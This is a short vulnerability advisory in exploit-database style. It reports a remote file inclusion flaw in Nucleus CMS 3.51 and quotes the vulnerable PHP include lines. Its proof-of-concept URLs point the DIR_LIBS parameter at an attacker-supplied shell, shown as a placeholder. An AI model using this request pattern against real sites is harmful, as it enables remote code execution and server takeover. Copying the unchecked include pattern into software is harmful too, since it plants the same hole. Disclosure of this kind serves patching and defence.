Nucleus CMS v.3.51 (DIR_LIBS) Multiple Vulnerability
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____________ Author:eidelweiss
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[+]Software:Nucleus CMS
[+]Version: Nucleus v3.51 (Other or lower version may also be affected)
[+]License: GNU/GPL (Free Software)
[+]Homepage: http://nucleuscms.org/download.php
[+]Download: http://prdownloads.sourceforge.net/nucleuscms/nucleus3.51.zip?download
[!]Discovered: eidelweiss
[!]Contact: eidelweiss[at]cyberservices[dot]com
[!]Thank`s: sp3x (securityreason) - r0073r & 0x1D (inj3ct0r) loneferret - Exploits - dookie2000ca (exploit-db)
JosS (hack0wn) - g1xx_achmed - [D]eal [C]yber - Syabilla_putri (i miss u so much to)
Nucleus allows you to easily maintain your own weblog(s) on your own server. It offers a system that is easy to install, but still offers maximum flexibility. (PHP4/MySQL)
-=[VUln Code]=-
$CONF = array();
// common functions
include_once($DIR_LIBS . 'ACTION.php');
$action = requestVar('action');
$a =& new ACTION();
$errorInfo = $a->doAction($action);
$CONF = array();
require("../../config.php"); // include Nucleus libs and code
include($DIR_LIBS . "xmlrpc.inc.php");
include($DIR_LIBS . "xmlrpcs.inc.php");
$strRel = '../../../';
require($strRel . 'config.php');
include($DIR_LIBS . 'PLUGINADMIN.php');
-=[ P0C ]=-
Http://[path_to_nucleus]/action.php?DIR_LIBS= [inj3ct0r sh3ll]
Http://[path_to_nucleus]/nucleus/xmlrpc/server.php?DIR_LIBS= [inj3ct0r sh3ll]